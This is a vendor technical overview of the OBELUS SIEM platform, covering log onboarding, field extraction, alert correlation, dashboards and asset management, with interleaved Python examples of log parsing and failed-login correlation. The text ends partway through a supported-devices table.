All Rights Reserved. Copyright 2019-2020. TechnoMinds Cyber Labs 1
Technical Overview
Contents
  OBELUS SIEM ... 5
  OBELUS PRODUCT FEATURES & DESCRIPTIONS ... 7
  DEPLOYMENT OPTIONS ... 9
    Single Installed Collector ... 9
    Multiple Installed Collectors ... 9
    Cloud or Data Center Deployment ... 10
LOG ON-BOARDING ... 10
    Collector and Source Installation and Configuration ... 10
    Agent Installation and Configuration ... 11
  SOURCE CONFIGURATION ... 11
    Manual Configuration ... 11
    Download Configuration from OBELUS UI ... 11
  FIELD EXTRACTION ... 13
    Create Field Extraction Rule ... 13
    Edit Field Extraction Rules ... 15
EVENT AND ALERT CREATION ... 16
  CREATE EVENT ... 16
  CREATE ALERT ... 18
  EVENT CORRELATION FILTER ... 19
  CUSTOM FIELD ... 19
  NOTIFICATIONS ... 19
    Configure Alerts by Email Notification ... 20
    Configure Alerts by Notable Notification ... 20
    Configure Alerts by Ticket Notification ... 21
DASHBOARDS ... 22
    Edit Widget Configuration ... 24
    Create Dashboard ... 24
REAL-TIME ALERT MONITORING ... 26
ASSET MANAGEMENT ... 28
    Adding Asset Manually ... 28
    Edit Asset ... 29
    Delete Asset ... 30
LOG STORAGE/RETENTION ... 31
  OBELUS SIEM SUPPORTED DEVICES AND LOG TYPES ... 31
  OBELUS SIEM SUPPORTED OUT OF THE BOX (OOTB) LOG TYPES ... 32
MANAGED SECURITY SERVICE PROVIDERS (MSSP) ... 33
    Create Organization ... 33
    Provision Organization ... 34
ROLE BASED ACCESS CONTROL (RBAC) ... 35
  ROLE CAPABILITIES ... 35
  CREATE ROLE ... 38
  CREATE USERS ... 39
  EDIT USERS ... 39
INCIDENT RESPONSE PLAN ... 40
CASE MANAGEMENT ... 41
    Creating a Case for an Incident ... 41
INVESTIGATION GRAPH ... 44
  USE CASE: PHISHING E-MAIL ... 44
    Attack Execution ... 44
    Configure Events ... 44
    Configured Notable Events/Rules ... 47
    Investigation for Alert ... 47
  REPORT GENERATION TOOL ... 50
THREAT INTELLIGENCE ... 53
    What is OSINT ... 53
    Why OSINT ... 53
    Configured OSINT Feed ... 53
    Create Threat Feed ... 54
    Edit Threat Feed ... 56
    Delete Threat Feed ... 57
  MANAGE INDICATORS OF COMPROMISE ... 58
    What Are Indicators of Compromise (IOC) ... 58
    Create Indicator ... 58
    Whitelisting ... 59
    Bulk White/Blocklist Indicator ... 59
    Bulk Upload Indicator ... 60
  THREAT INTEL DASHBOARD ... 61
THREAT HUNTING ... 61
    Threat Hunting Methodologies ... 61
    Hypothesis-driven Investigation ... 62
    Investigation Based on Known Indicators of Compromise or Indicators of Attack ... 62
    Advanced Analytics and Machine Learning Investigations ... 62
HISTORIC LOG SEARCH ... 62
UBA ... 64
    OBELUS UBA Platform ... 64
    Create Use Case for Successful User Logon Attempts ... 65
HIGHLIGHTS
✓ Real-time Security Monitoring
✓ Deliver Real-Time Operational Intelligence
✓ Proactively detect and investigate security incidents
✓ Behavior Profiling to understand trends & patterns of activity
✓ Detect & Respond to threats before they impact your business
✓ Visual Incident Response Plan with Customization
✓ Investigation by Graph (Internal & External)
✓ Auto Scalability & Reliability
✓ Threat Hunting (MITRE ATT&CK)
✓ Compliance Monitoring & Reporting
Delivering a Combined End-to-End Solution

Collect, Index & Store: OBELUS SIEM can collect and index any machine data from virtually any source, format or location in real time. Data streams from all kinds of log sources, such as packaged and custom applications, application servers, web servers, databases, network devices, virtual machines, operating systems, endpoint sensors, mainframes and much more.

Real-time Monitoring and Alerting: Real-time alert monitoring based on defined thresholds and conditions, with auto-configured alerts that send notification emails.

Advanced Analytics with OBELUS-SIEM: Threat detection with user behavior analytics and MITRE ATT&CK monitoring, creating actionable intelligence on known and unknown risks.

Incident Response Platform: Inbuilt Incident Response Plans help security analysts respond to cyber threats faster and more efficiently.

Threat Intelligence & Collaboration: Proactively detect and mitigate threats in your environment with real-time insight into indicators of compromise (IOC).

Threat Hunting with MITRE ATT&CK: Improve proactive and post-compromise detection of adversaries in enterprises by illustrating the actions an attacker may have taken.

UBA Platform: An incredibly powerful tool to detect compromise early, mitigate risk and stop an attacker from exfiltrating an organization's data.

Case Management Platform: Fully integrated with advanced analytics, enabling you to optimize and document analysis.

Threat Investigation Platform: Helps security teams investigate potential cybercrime threats quickly and efficiently by giving analysts a holistic view.

Compliance Reporting & Dashboards: Having a SIEM is a core part of a number of compliance regimes, such as PCI-DSS, HIPAA, GDPR and ISO 27001.

Asset Management: A platform that helps track all registered devices and allow or deny them from sending logs to the SIEM.
ABOUT OBELUS SIEM
OBELUS Combined Security Management (CSM) delivers a unified, simple and affordable solution for Security Information and Event Management (SIEM), incident response, threat detection, threat analysis and compliance. Powered by the latest [TMCL] Labs Threat Intelligence and by Global Threat Intelligence from the most trusted sources for threat intelligence exchange, CSM enables organizations to defend proactively against modern threats. The Techno Minds SIEM platform (OBELUS) combines user and entity behavior analytics (UBA), Threat Intelligence (TI), MITRE ATT&CK, Incident Response (IR) and Case Management (CM) in a single end-to-end solution. OBELUS Security Information and Event Management (SIEM) is equipped to detect cyber threats in real time with a powerful, scalable and efficient SIEM engine built on a low-latency, high-throughput platform.
Figure 1: OBELUS Log Collection and Processing.
Security and Log Management: Effective logging and monitoring helps an organization protect confidential information, perform careful trend analysis and identify significant improvements to its security management program.

Log Management (LM): Log collection is the heart and soul of a SIEM. OBELUS collects and stores log files from operating systems and applications across various hosts and systems. The OBELUS platform is designed to scale without difficulty or cost, providing secure data storage at a reasonable price. This supports long-term storage, analysis, manipulation and reporting on logs and security records.

Security Event Management (SEM): Focuses on real-time monitoring, correlating events, providing comprehensive console views and customizing notifications. It enhances your incident reports and improves your investigations using security and non-security data collected from across your organizational infrastructure.

Security Information Management (SIM): OBELUS-SIEM with the Combined Security Management (CSM) platform provides real-time analysis of security alerts and improves threat detection and response capabilities in your organization. It also provides long-term storage, analysis, manipulation and reporting on logs and security records.

Security Event Correlation (SEC): Tracks and alerts security analysts when an abnormal series of events occurs, such as three failed login attempts under the same user name on different machines. Improve security operations and streamline investigations by using ad hoc searches in addition to static, dynamic and visual correlations.

Log Test Simulator: The inbuilt Log Simulator in OBELUS-SIEM is a utility that lets users build real-time events and generate real-time logs for testing. It also lets users create log templates and schedule real-time logs or generate them on demand, so that events arrive directly in OBELUS-SIEM; this reduces the time and effort of obtaining real-time logs before integrating any device log.
Figure 2: OBELUS Security Posture Dashboards.
OBELUS Product Features & Descriptions

Indexing Volume: Scales to hundreds of terabytes per day
Data Onboarding: Wizard-based workflow to simplify onboarding of any data source
Auto Scalability & Reliability: Ability to support the burst rate of logs generated by the devices at a given point in time
UBA Behavior Profiling: User and entity behavior analytics analyze user activity from logs to identify malicious behaviors
Visual Incident Response Plan: Instructions to help IT staff detect, respond to, and recover from network security incidents
Customizable Incident Response Plans (IRP): Option to customize the Incident Response Plans according to your needs
Historic Search: Ad hoc search across real-time and historical data
Monitoring and Alerting: Real-time monitoring and alerting for individual and correlated real-time events
Reporting: Ad hoc and pre-defined reports across real-time and historical data
Dashboards: Highly customizable and inbuilt dashboards for real-time machine data
Customization of Events: Customize the events that are relevant and correlate based on them
Data Model: Used to define consistent relationships in machine data
Pivot: Drag-and-drop UI to explore, manipulate and visualize machine data
Anomaly and Pattern Detection: Automatically discovers patterns, commonalities and anomalies in your data with a single click
PDF Delivery: Scheduled and automated PDF generation and delivery of reports and dashboards
Access Control & Single Sign-On: Integrated role-based access control and user authentication with LDAP, Active Directory and single sign-on via SAML
Compliance Monitoring & Reporting: Support and fulfill compliance needs with the inbuilt platform and reports
Threat Intelligence: Threat Intelligence (OSINT & Commercial) & Feed Management
Threat Hunting (MITRE ATT&CK): Covers APT3 TTPs used by adversaries
Log Parsing Tool (onboard any log): Eases log parsing for devices that need additional field extractors
Case Management: Manage security alerts by creating cases, assigning them, documenting artifacts, performing investigation and tracking resolution
Asset Management: Manage your devices that are onboarded and reporting logs to OBELUS
WHY OBELUS SIEM
OBELUS Combined Security Management (CSM) delivers a unified, simple and affordable solution that gives you real-time
visibility into all the activities on your IT systems, networks, databases, and applications.
✓ Real Time Monitoring (Low Latency)
✓ Auto scalable platform.
✓ Automated Threat Context.
✓ Highly Customizable.
✓ No scripting or coding skills required.
✓ Custom Report Generation.
✓ OOTB – (Case Management, Threat Intel, Threat Hunting)
HOW IT WORKS
OBELUS receives logs from various devices via agents, syslog servers and other forwarders, translates them in real time into meaningful, normalized events, executes the configured rules and raises alerts when they match.
Deployment Options
You can install agents and configure sources on any mix of OS, i.e. Windows, Linux and Mac hosts, in your environment. When deciding where to install agents, consider your network topology, available bandwidth, and domains or user groups.
Single Installed Collector
An agent can be installed on any standard server that you use for log aggregation or other network services. For example, you might decide to centralize collection with just one Collector installed on a dedicated machine, especially if all of your data can be accessed from a single network location.
Figure 4 a: Single Agent Deployment.
Multiple Installed Collectors
If you have a distributed network topology, you can install multiple agents on multiple machines and set up any combination of sources to collect from your infrastructure.
Figure 4 b: Multi Agent Deployment.
Cloud or Data Center Deployment
Agents can be deployed across a cloud or data center, where agents on each machine report to OBELUS independently, sending distinct log data so that you can query against any virtual machine or server in your deployment.
Log On-boarding
An Installed Agent is a GO agent that sends logs and metrics from its Sources and then encrypts, compresses, and sends the
data to the Obelus service. As its name implies, an Installed Agent is installed in your environment, as opposed to a Hosted Log
Collector, which resides on the Obelus service. After installing an Agent, you add Sources, to which the Log Collector connects
to obtain data to send to the Obelus service.
An Obelus Source is an object, configured for a specific Log Collector that scans a particular target periodically and sends newly
available data to the Log Collector. There are a number of Source types in Obelus that work with Installed Agents. Examples
include:
File Sources—Local and Remote File Sources collect logs from selected directories on the Collector host, or a remote one.
Windows Event Log Sources—Local and Remote Windows Event Log Sources collect Windows events from the
Collector host or a remote one.
Windows Performance Monitor Log Sources—Local and Remote Windows Performance Monitor Log
Sources collect Windows performance data from the Collector host, or a remote one.
Docker Sources—Docker Sources collect Docker container logs, events, and stats from Docker.
Collector and Source Installation and Configuration
This section is an overview of the multiple methods Obelus provides for installing and configuring Agents and Sources.
Agent Installation and Configuration
Before installing an agent, you need to add the IP address, MAC address and hostname of the device on which the agent will be installed.
OBELUS provides the following options to install an Agent:
1. Command line installation for Windows
2. RPM/binary based installation for Linux and Mac OS.
Source Configuration
Manual Configuration:
You can set up as many as 1,000 Sources on a given Agent. A Source should be configured to collect similar data types. For example, you might set up three Local File Sources to collect router activity logs from three locations, and another Local File Source to collect logs from a web application.
Each Source is tagged with its own metadata, like log_type, log_device. The more Sources you set up, the easier it is to isolate
one of the Sources in a search since each Source can be identified by its metadata.
When you configure Sources that read from log files, you specify a path expression that defines what files to scan. You can
optionally configure a blacklist of files to exclude from collection.
You can create Sources using the OBELUS web app at any time after Collector installation. For source-specific instructions, see
the topics below Sources for Installed Collectors.
Alternatively, you can define Sources for an Installed Collector in a UTF-8 encoded JSON file, in which case you must provide the
file when starting the Collector for the first time. For more information, see Use JSON to Configure Sources. Note that if you
provide the Sources configuration in a JSON file, you can no longer manage the Sources through the OBELUS web app.
Download Configuration from OBELUS UI
Optionally, you can download the configuration from the UI as well.
• Log on to OBELUS
• Navigate to Settings
• Click on Data Input
• Select the Log Shippers menu
• Select the device that you onboarded
• Click on Configuration Wizard
• Select log device, log type and click on create YML button.
Figure 5: OBELUS OOTB log source support.
Figure 6: Windows Collector
Field Extraction
Field extractions allow you to parse fields from your log messages at the time the messages are ingested, which eliminates the
need to parse fields at the query level. With Field Extraction Rules (FERs) in place, users can use the pre-parsed fields for ad-
hoc searches, scheduled searches, real-time alerts, and dashboards. In addition, field extraction rules help standardize field
names and searches, simplify the search syntax and scope definition, and improve search performance.
You need the Manage field extraction rules role capability to create a field extraction rule.
Figure 7: Extract Fields
The Settings > Configuration > Extract Fields page displays the following information:
• Rule name
• Log Device
• Log Type
• Create date and time by user
• Last modified date and time by user
On the Settings > Configuration > Extract Fields page you can:
• Create a Field Extraction Rule
• Search Field Extraction Rules
• Edit a Field Extraction Rule
• Delete a Field Extraction Rule
• See Details of a Field Extraction Rule
Create Field Extraction Rule
To create a Field Extraction Rule:
1. Go to Manage Data > Settings > Field Extraction Rules.
2. Click Add.
3. Enter the following options:
• Parser Name. Type a name that makes it easy to identify the rule.
• Parser Description. Type a description for more information.
• Log Device: Select the log device to which you want to apply the parser.
• Log Type: Select the log type to which you want to apply the parser.
• Parser Type: Select the parser type, such as JSON, Delimiter or Regex.
4. Search existing log messages by selecting a time range and a search query.
Figure 8: Log Messages
5. Select the log message to which the rule should apply.
6. Expand Regex and select the field to which the regex applies.
Figure 9: Expand Regex
7. Select and click the field value in the message that is to be extracted as a new field.
8. Provide a name for this field. Specify the prefix and suffix of the field value.
9. Click Create Show Patterns to generate a parser rule or regex (regular expression) pattern. Possible regular expressions are shown, or you can add your own regular expression.
10. Click Apply to generate the regular expression for the selected log message.
11. You can optionally add conditions specific to the rule.
12. In the case below, the rule applies only when the message contains the IP address 83.149.9.216.
Figure 10: Applying rule
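The parser model behind the highlight, prefix/suffix and condition steps of the procedure above, as an added example that is not OBELUS code: a hypothetical Regex-type field extraction rule with an optional "message contains" condition, applied at ingest to constructed Apache-style access log lines, plus a helper that turns a highlighted value and its prefix/suffix into a named-group pattern. The class, function and field names are assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample messages in Apache access-log style (sample data, not OBELUS output);
# 83.149.9.216 is the address used as the rule condition in the procedure above.
SAMPLE_MESSAGES = [
    '83.149.9.216 - - [17/May/2015:10:05:03 +0000] "GET /images/kibana-search.png HTTP/1.1" 200 203023',
    '10.0.0.5 - - [17/May/2015:10:05:43 +0000] "POST /login HTTP/1.1" 401 512',
    'kernel: eth0: link is up (not an access log line at all)',
]


@dataclass
class FieldExtractionRule:
    """Hypothetical model of a Regex parser rule: the Parser Name, Log Device and Log Type,
    a regex with one named group per extracted field, and the optional 'message contains'
    condition from the last two steps of the procedure."""
    parser_name: str
    log_device: str
    log_type: str
    pattern: str
    condition: Optional[str] = None

    def __post_init__(self) -> None:
        self.regex = re.compile(self.pattern)

    def applies_to(self, message: str) -> bool:
        # A rule with a condition is evaluated only against messages containing that literal.
        return self.condition is None or self.condition in message

    def extract(self, message: str) -> Dict[str, str]:
        # Extraction happens once at ingest: a non-matching message yields no fields
        # (not an error), so later searches simply see the field as absent.
        if not self.applies_to(message):
            return {}
        match = self.regex.search(message)
        return match.groupdict() if match else {}


def regex_from_selection(message: str, value: str, field_name: str,
                         prefix: str = "", suffix: str = "") -> str:
    """Mirror the highlight-and-name step: the prefix and suffix around the selected value
    become escaped literal anchors and the value itself becomes a named capture group.
    Raises if the generated pattern would recover a different value from the sample."""
    if not value or prefix + value + suffix not in message:
        raise ValueError("prefix + value + suffix must occur verbatim in the sample message")
    # With a suffix the value can be anything up to that suffix; without one, stop at whitespace.
    capture = rf"(?P<{field_name}>.+?)" if suffix else rf"(?P<{field_name}>\S+)"
    pattern = re.escape(prefix) + capture + re.escape(suffix)
    match = re.search(pattern, message)
    if match is None or match.group(field_name) != value:
        raise ValueError("generated pattern matches a different value; choose a longer prefix")
    return pattern


def apply_rules(rules: List[FieldExtractionRule], messages: List[str]) -> List[Dict[str, str]]:
    """Ingest-time extraction: each message keeps its raw text plus the union of the fields
    produced by every rule that applies to it."""
    events = []
    for message in messages:
        event = {"_raw": message}
        for rule in rules:
            event.update(rule.extract(message))
        events.append(event)
    return events


# Full access-log parser for a hypothetical 'apache' device / 'access' log type.
APACHE_ACCESS_RULE = FieldExtractionRule(
    parser_name="apache_access",
    log_device="apache",
    log_type="access",
    pattern=(r'^(?P<client_ip>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] '
             r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+)'),
)

# The conditional variant: same device and type, but only for messages from one client address.
WATCHED_CLIENT_RULE = FieldExtractionRule(
    parser_name="apache_access_watched_client",
    log_device="apache",
    log_type="access",
    pattern=r'^(?P<watched_ip>\S+) .*" (?P<watched_status>\d{3}) ',
    condition="83.149.9.216",
)


if __name__ == "__main__":
    for event in apply_rules([APACHE_ACCESS_RULE, WATCHED_CLIENT_RULE], SAMPLE_MESSAGES):
        print({k: v for k, v in event.items() if k != "_raw"})
    print(regex_from_selection(SAMPLE_MESSAGES[0], "200", "status", prefix='" ', suffix=" "))
```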
Edit Field Extraction Rules
Changes to Field Extraction Rules are implemented immediately. Additionally, you can save a copy of a rule and make edits to the new version of the rule without making any changes to the original rule.
1. Go to Manage Data > Settings > Field Extraction Rules.
2. Click on the view details link.
Figure 11: Field Extraction Rules
Figure 12: Extract Fields
3. Click on Edit Parser Button
Figure 13: Extract Fields Edit Parse
4. Change the Rule Name, Parser Name, Log Device, Log Type or Parser Expression as needed, then click Save.
Event and Alert Creation
Events provide information about the systems that produce the metadata. The term event data refers to the contents of an OBELUS index.
Create Event
1. Create a new event from the OBELUS main page in Settings > Configuration.
2. Select New events > Events. Right click > Select New Category (Example: New Node; name the Event category).
3. Right click > New Category > New Event
4. New Event > Event Information
5. From the Event Information page add the following event information to configure the new event.
• Enter an Event Name
• Enter a Description for the event that describes why you created the event.
• (Optional) Select a Log Device
• (Optional) Select a Severity
• (Optional) Select a Category
• (Optional) Select Tags
• (Optional) Select Data Enrichment
• (Optional) Select Event Fields
• (Optional) Select Event Filter
• Select required Fields
Event Filter > Add rule with AND/OR conditions.
• Select Log Field
• Fields related to events
• Value can be anything
The same steps apply to Add group with AND/OR conditions. Save the work.
Create Alert
You can manually create a notable event from existing events. From the OBELUS main page go to Settings.
1. Select New Events > Notable Events. Right-click and select New Category.
2. (Example: New Node names the notable event category.)
3. Right-click the new category and select New Event.
4. On the New Event page open Notable Event Information.
5. Enter an Event Name
6. Enter a Description for the event that describes why you created the notable event or what needs to be investigated.
7. (Optional) Select a Severity
8. (Optional) Select a Category
9. (Optional) Select Tags
10. Select required Fields
Event Correlation Filter
OBELUS ships with built-in use cases based on these events and also supports event correlation.
1. Select the related event
2. Select the Aggregation Type, for example an approximate count of distinct values (the number of unique values of a field)
3. (Optional) Select the aggregation fields
4. (Optional) Select an operator (greater than/less than/equal)
5. (Optional) Enter the threshold value
6. (Optional) Enter the time span
7. (Optional) Select a time unit (Days/Hours/Minutes/Seconds)
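As an added example (not OBELUS code), the Python below puts the Event Filter from the Create Event steps (AND/OR rule groups, including a nested group) and the correlation filter above (aggregation type, operator, value, time and time unit) together: events that pass the filter enter a sliding time window, the distinct values of the aggregation field inside that window are counted, and the count is compared with the threshold using the chosen operator. The sample events, the field names, the rule-group encoding and the once-per-burst alerting behaviour are assumptions made for the example; the page does not describe OBELUS's internal evaluation.

```python
from collections import deque
from datetime import datetime, timedelta

# Constructed sample events (not from the original page): authentication
# results as they might look after field extraction.
SAMPLE_EVENTS = [
    {"ts": "2020-03-01T10:00:05", "event": "auth_failure", "user": "alice", "src_ip": "203.0.113.10"},
    {"ts": "2020-03-01T10:00:40", "event": "auth_failure", "user": "alice", "src_ip": "203.0.113.11"},
    {"ts": "2020-03-01T10:01:10", "event": "auth_success", "user": "bob", "src_ip": "203.0.113.12"},
    {"ts": "2020-03-01T10:01:30", "event": "auth_failure", "user": "alice", "src_ip": "203.0.113.12"},
    {"ts": "2020-03-01T10:02:00", "event": "auth_failure", "user": "alice", "src_ip": "203.0.113.13"},
    {"ts": "2020-03-01T10:20:00", "event": "auth_failure", "user": "alice", "src_ip": "203.0.113.14"},
]

# Event Filter encoding (an assumption): a group is {"op": "AND" | "OR",
# "rules": [...]}; each rule is {"field": ..., "value": ...} or a nested group.
EVENT_FILTER = {
    "op": "AND",
    "rules": [
        {"field": "event", "value": "auth_failure"},
        {"op": "OR", "rules": [{"field": "user", "value": "alice"},
                               {"field": "user", "value": "svc-backup"}]},
    ],
}


def matches(event, group):
    """Evaluate a rule group against one event, recursing into nested groups."""
    results = []
    for rule in group["rules"]:
        if "rules" in rule:
            results.append(matches(event, rule))
        else:
            results.append(str(event.get(rule["field"])) == str(rule["value"]))
    return all(results) if group["op"] == "AND" else any(results)


OPERATORS = {
    "greater than": lambda actual, threshold: actual > threshold,
    "less than": lambda actual, threshold: actual < threshold,
    "equal": lambda actual, threshold: actual == threshold,
}
TIME_UNITS = {"Seconds": 1, "Minutes": 60, "Hours": 3600, "Days": 86400}


def correlate(events, event_filter, aggregation_field, operator, value, time, time_unit):
    """Sliding-window correlation: among events that pass the filter, count the
    distinct values of aggregation_field seen within the last `time` units and
    raise an alert when `<count> <operator> <value>` holds. After an alert the
    window is cleared so that one burst produces one alert (an assumption for
    this example; the page does not say how OBELUS de-duplicates)."""
    window = timedelta(seconds=time * TIME_UNITS[time_unit])
    recent = deque()  # (timestamp, aggregation value) pairs inside the window
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if not matches(ev, event_filter):
            continue
        now = datetime.fromisoformat(ev["ts"])
        recent.append((now, ev[aggregation_field]))
        while now - recent[0][0] > window:
            recent.popleft()
        distinct = len({v for _, v in recent})
        if OPERATORS[operator](distinct, value):
            alerts.append({"ts": ev["ts"], "distinct_count": distinct,
                           "values": sorted({v for _, v in recent})})
            recent.clear()
    return alerts


if __name__ == "__main__":
    # Use case: one account failing from more than 2 distinct source IPs within 5 minutes.
    for alert in correlate(SAMPLE_EVENTS, EVENT_FILTER, "src_ip", "greater than", 2, 5, "Minutes"):
        print(alert)
```

The window is measured from the newest matching event backwards, so the late failure at 10:20 does not count the earlier ones; if the correlation should instead fire on a fixed-interval schedule (every N minutes over the last N minutes), the same distinct count is computed over the bucket rather than the deque.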
Custom Fields: you can add more custom fields with Add Row and choose additional custom fields from the Key and Value drop-downs.
Notifications: you can configure alert notifications with the options below.
• Configure alert Notification
• Configure alerts by Email notification
• Configure alerts by Notable notification
• Configure alerts by Ticket notification
Configure Alert Notification
• Specify the conditions that trigger the alert, based on the number of results.
• Set the number of results that satisfies the trigger condition (greater than, less than or equal).
• (Optional) Specify field values that trigger an alert in real time.
Configure Alerts by Email Notification
Send an email notification to specified recipients when an alert triggers. The email can include details of the alert that fired. You set up an email notification action from the Notable Event page.
1. Click Notifications and select Email
2. Enter a comma-separated list of recipient email addresses.
3. (Optional) Provide the email subject and message
Configure Alerts by Notable Notification
1. Enter a title for the notable event
2. Enter a Description that explains why you created the notable event or what needs to be investigated.
3. Enter the alert message describing what was observed across your network applications, systems and devices.
4. Enter a drill-down name for the alert data received from a specific input.
5. The drill-down can perform actions on fields, tags and event segments.
6. (Optional) Select an IRP (Incident Response Plan)
Configure Alerts by Ticket Notification
1. Enter a ticket title
2. Enter a Description that explains why you created the notable event or what needs to be investigated.
3. (Optional) Select a Priority
4. Enter the assignee by searching for the user's email ID.
5. Click Create Event to save the new notable event.
Dashboards
Dashboards are a powerful forensic tool for creating searches and viewing search results based on the data available through a search.
• If you are having problems with your systems or network, you can move backward in time to pinpoint exactly when the problems occurred and analyze additional search results to uncover the root cause.
• Reports and long-term trend analysis provide historical context and are useful in any situation in which live data is less relevant than historical data.
• Dashboards populate completely every time you launch them and backfill data as needed, so there is a delay before you see all the data. If you change the time range, the data panels rerun the search.
• In Live Mode, dashboards provide a real-time view of your system, continually updating as data comes in.
Dashboards contain a collection of panels:
• Widgets provide a graphical representation in the form of a chart of your organization's data.
• Text and Title Panels allow you to add context to the data in the dashboard.
Below are the steps to create a widget.
1. Go to Settings > Widgets > New Widget.
2. Enter the widget title
3. Choose events, rules, cases or alerts as the data source
Figure 14: Manage Widgets
4. Click Preview; the following options are displayed:
a. Expand fields to aggregate the selected logs
b. Select the chart type you want to display
c. Drag the selected log fields onto the chart to display their data
d. Drag a log field onto the value field to aggregate on that field
5. Click Preview to preview the widget
6. Click Submit to save the widget
Edit Widget Configuration
• Go to Settings > Widgets and choose Edit Widget in the table.
• Enter the widget title
• Click Preview; the following options are displayed:
• Expand fields to aggregate the selected logs
• Select the chart type you want to display
• Drag the selected log fields onto the chart to display their data
• Drag a log field onto the value field to aggregate on that field
• Click Preview to preview the widget
• Click Submit to save the widget
Create Dashboard
1. Go to Settings > Dashboards
2. Right-click the category and click the New Category link
Figure 15: Create Dashboard
3. Click the pencil icon in the top right corner
4. Enter the dashboard title
5. Select the permission type
6. Select the dashboard category
7. Choose the permissions required for dashboard visibility
Figure 16: Dashboard Visibility
8. Click Close
9. Click the plus sign to choose from the available widgets
10. Click the tick button to save the changes
Figure 17: Widgets
Real-Time Alert Monitoring
OBELUS SIEM detects threats and raises real-time alerts when analysis shows that an activity matches a predetermined rule set and therefore indicates a potential security issue.
1. Log in with a valid username and password
2. Click the "Alerts" tab on the header bar
3. Select the time range for which to view alerts
4. Alerts are grouped by rule/alert name; select the alert you wish to investigate
5. Click the (>) drill-down option to view the individual alert
6. Click the checkbox to see the event details
7. Click the Event Count value to view fields such as username and source IP
8. Use the search option to find alerts quickly by priority, category, timestamp and so on
9. Analysts can add additional fields from the Filter tab if required during analysis
10. To investigate the alert, analysts can create a case by clicking "Add To Case"
11. For a deep-dive investigation, analysts can create an investigation by clicking "Add To Investigation"
Figure 18: OBELUS Real-Time Threat Monitoring Console.
Asset Management
Assets and asset profiles that are created for servers and hosts in your network provide important information to assist you in resolving security issues. Using the asset data, you can connect offenses that are triggered in your system to physical or virtual assets, which gives you a starting point for a security investigation.
The Assets tab in OBELUS provides a unified view of the known information about the assets in your network. As OBELUS discovers more information, it updates the asset profile and incrementally builds a complete picture of the asset.
Asset profiles are built dynamically from identity information that is passively absorbed from event data and from information that OBELUS actively gathers during a vulnerability scan. You can also import asset data or edit the asset profile manually.
This asset information is also helpful for maintaining licenses.
Sources of asset data:
Asset data is received from several different sources in your OBELUS deployment.
Asset data is written to the asset database incrementally, usually 2 or 3 pieces of data at a time. With the exception of updates from network vulnerability scanners, each asset update contains information about only one asset.
Asset data usually comes from one of the following asset data sources:
• Events
Event payloads, such as those created by DHCP or authentication servers, often contain user logins, IP addresses, host names, MAC addresses, and other asset information. This data is immediately provided to the asset database to help determine which asset the asset update applies to.
Events are the primary cause for asset growth deviations.
• User interface
Users who have the Assets role can import asset information or enter it directly into the asset database. Asset updates provided directly by a user apply to a specific asset.
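As an added example that is not OBELUS code, the Python below shows what "which asset the update applies to" means in practice: it merges a stream of small asset updates (DHCP, authentication and user-interface sources, all constructed) into profiles, preferring the MAC address over the IP address as the identifier, so that a reused IP address creates a new asset instead of polluting the old one. The precedence rule, the `AssetDatabase` class and the sample updates are assumptions made for the example.

```python
# Constructed asset updates derived from DHCP, authentication and user-interface
# sources (not from the original page). Each update carries only a few fields,
# as the text above describes.
UPDATES = [
    {"source": "dhcp", "mac": "00:11:22:33:44:55", "ip": "10.0.0.5", "hostname": "ws-001"},
    {"source": "auth", "ip": "10.0.0.5", "user": "alice"},
    {"source": "dhcp", "mac": "00:11:22:33:44:55", "ip": "10.0.0.9"},   # new lease
    {"source": "auth", "ip": "10.0.0.5", "user": "bob"},                # IP reused by another host
    {"source": "ui", "mac": "00:11:22:33:44:55", "hostname": "alice-laptop"},
]


class AssetDatabase:
    """Profiles keyed by an internal id. The MAC address is the strongest
    identifier and the current IP address the weakest; this precedence is an
    assumption made for the example."""

    def __init__(self):
        self.assets = {}
        self._next_id = 1

    def _find(self, update):
        """Return the id of the profile an update belongs to, or None."""
        if "mac" in update:
            for asset_id, asset in self.assets.items():
                if asset.get("mac") == update["mac"]:
                    return asset_id
        if "ip" in update:
            for asset_id, asset in self.assets.items():
                if asset.get("ip") == update["ip"]:
                    return asset_id
        return None

    def apply(self, update):
        """Merge one update into the matching profile or create a new one.
        Returns the id of the profile that was touched."""
        asset_id = self._find(update)
        if asset_id is None:
            asset_id = self._next_id
            self._next_id += 1
            self.assets[asset_id] = {"users": []}
        asset = self.assets[asset_id]
        for key, value in update.items():
            if key == "source":
                continue
            if key == "user":
                if value not in asset["users"]:
                    asset["users"].append(value)
            else:
                asset[key] = value   # newest value wins, so a UI edit overrides an event
        return asset_id


def build_asset_db(updates):
    db = AssetDatabase()
    for update in updates:
        db.apply(update)
    return db


if __name__ == "__main__":
    for asset_id, asset in build_asset_db(UPDATES).assets.items():
        print(asset_id, asset)
```

The fourth update is the interesting one: without the lease change recorded by the third update, bob's login would have been attached to ws-001, which is exactly the kind of asset growth deviation the text attributes to event-driven updates.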
Adding Asset Manually
1. Go to Settings > Assets > Assets.
2. The Assets page lists assets with IP Address, Host Name and MAC Address
Figure 19: Assets
3. Click on New Asset Button
Figure 20: New Asset
4. Enter the source IP
5. Enter the hostname
6. Enter the MAC address
7. Click Save to confirm the changes.
Edit Asset
1. Go to Settings > Assets > Assets.
2. The Assets page lists assets with IP Address, Host Name and MAC Address
3. Select the table row that you want to edit.
Figure 21: Edit Asset
4. Click Edit and enter the updated source IP, hostname and MAC address
5. Click Save to persist the changes.
Delete Asset
1. Go to Settings > Assets > Assets.
2. The Assets page lists assets with IP Address, Host Name and MAC Address
3. Select the table rows that you want to delete
4. Click Delete to delete the selected rows
Log Storage/Retention
The following table shows the default storage configuration for OBELUS components.
Tier | Retention | Storage
Short Term Store | up to 30 days | SSD
Mid Term Storage | more than 30 days and up to 365 days | S3 Buckets
Long Term Storage | more than 1 year | Glacier
OBELUS SIEM supported devices and log types (the vendor is shown once per group, as in the original table):
Vendor Name | Device | Type | Log Type
Check Point | Check Point Firewall | | OPSEC
Amazon | CloudTrail | Generic | API
Apple Inc. | Mac OS X | Applications/Host/Server/Operating Systems/Web Content/Filtering/Proxies | Syslog
Barracuda Networks | Web Application Firewall | Security Appliances/UTMs | Syslog
 | Web Filter | Security Appliances/UTMs | Syslog
 | Spam Firewall | Security Appliances/UTMs | Syslog
Blue Coat | ProxySG | Web Content/Filtering/Proxies | Syslog
Bro | Network Security Monitor | Network Security | Syslog
